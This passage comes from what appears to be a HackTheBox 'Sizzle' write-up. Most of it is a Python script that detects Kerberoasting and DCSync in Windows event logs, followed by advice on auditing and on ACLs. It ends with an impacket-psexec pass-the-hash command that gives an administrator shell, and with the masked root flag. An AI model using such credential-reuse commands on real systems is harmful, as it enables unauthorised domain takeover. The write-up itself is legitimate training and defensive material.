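     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # unrelated 4662 with a placeholder property GUID (no replication right)
    {"EventID": 4662, "SubjectUserName": "mrlky", "ObjectName": "CN=amanda,CN=Users,DC=HTB,DC=LOCAL",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]


def kerberoast_candidates(events):
    """4769 with RC4 for a service account that is neither a computer nor krbtgt."""
    out = []
    for e in events:
        if e.get("EventID") != 4769:
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e.get("TicketEncryptionType", "").lower() in RC4_ETYPES:
            out.append((e.get("TargetUserName"), svc, e.get("IpAddress")))
    return out


def dcsync_candidates(events):
    """4662 carrying a replication GUID from an account that is not a DC."""
    out = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = [name for guid, name in REPL_GUIDS.items() if guid in props]
        if not rights or e.get("SubjectUserName", "").upper() in DC_ACCOUNTS:
            continue
        out.append((e.get("SubjectUserName"), e.get("ObjectName"), rights))
    return out


if __name__ == "__main__":
    for user, svc, ip in kerberoast_candidates(SAMPLE_EVENTS):
        print(f"possible Kerberoast: {user} requested an RC4 ticket for {svc} from {ip}")
    for user, obj, rights in dcsync_candidates(SAMPLE_EVENTS):
        print(f"possible DCSync: {user} used {', '.join(rights)} on {obj}")
```

Two caveats when wiring this to a real log: 4662 is only generated for replication calls if "Audit Directory Service Access" is enabled and the domain head carries a SACL for those control-access rights, and 4769 RC4 requests also come from legacy clients, so the service-account filter matters more than the encryption type alone. The underlying fix on this box is the ACL itself: a regular user should never hold DS-Replication-Get-Changes-All on the domain object, which is exactly the edge BloodHound surfaced.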
Access the machine with psexec.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :f6b7160bfc91823792xxxxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file APWgGeJS.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service Kabl on 10.10.10.103.....
[*] Starting service Kabl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Get administrator flag
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\administrator\Desktop> type root.txt
c3d8011c9688feccaxxxxxxxxxxxxxxx
Root Flag: c3d8011c9688feccaxxxxxxxxxxxxxxxx